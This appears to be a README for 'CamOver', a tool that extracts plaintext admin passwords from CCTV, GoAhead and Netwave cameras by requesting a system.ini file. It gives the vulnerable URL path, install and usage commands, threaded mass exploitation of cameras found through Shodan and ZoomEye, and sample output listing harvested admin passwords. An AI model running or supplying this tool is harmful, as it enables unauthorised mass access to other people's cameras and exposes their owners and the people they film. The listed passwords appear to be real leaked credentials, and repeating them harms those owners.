
Is a camera exploitation tool that allows to disclosure network camera admin password.


  • Exploits vulnerabilities in most popular camera models such as CCTV, GoAhead and Netwave.
  • Optimized to exploit multiple cameras at one time from list with threading enabled.
  • Simple CLI and API usage.

Tool effectively looks for http://{address}/system.ini?loginuse&loginpas and reads the username:password plaintext from the system.ini file.


python3 -m pip install git+


camover [-h] [-t] [-o OUTPUT] [-i INPUT] [-a ADDRESS] [--shodan SHODAN] [--zoomeye ZOOMEYE] [-p PAGES]


CamOver is a camera exploitation tool that allows to disclosure network camera admin password.

optional arguments:
  -h, --help            show this help message and exit
  -t, --threads         Use threads for fastest work.
  -o OUTPUT, --output OUTPUT
                        Output result to file.
  -i INPUT, --input INPUT
                        Input file of addresses.
  -a ADDRESS, --address ADDRESS
                        Single address.
  --shodan SHODAN       Shodan API key for exploiting devices over Internet.
  --zoomeye ZOOMEYE     ZoomEye API key for exploiting devices over Internet.
  -p PAGES, --pages PAGES
                        Number of pages you want to get from ZoomEye.


Exploiting single camera

Let’s hack my camera just for fun.

camover -a

Exploiting cameras from Internet

Let’s try to use Shodan search engine to exploit cameras over Internet, we will use it with -t for fast exploitation.

camover -t --shodan [API-KEY]
$ camover -t --shodan [REDACTED]
[*] Authorizing Shodan by given API key...
[+] Authorization successfully completed!
[+] ( - admin:SFR_2E98
[+] ( - admin:Bebbo000
[+] ( - admin:admin
[+] ( - admin:Misiek22!
[+] ( - admin:core7772
[+] ( - admin:quercus2403
[+] ( - admin:admin
[+] ( - admin:216828103
[+] ( - admin:IPCAM
[+] ( - admin:123456
[+] ( - admin:242893
[+] ( - admin:888888

Exploiting cameras from input file

Let’s try to use opened database of cameras with -t for fast exploitation.

camover -t -i cameras.txt -o passwords.txt

NOTE: It will exploit all cameras in cameras.txt list by their addresses and save all obtained passwords to passwords.txt.

URL List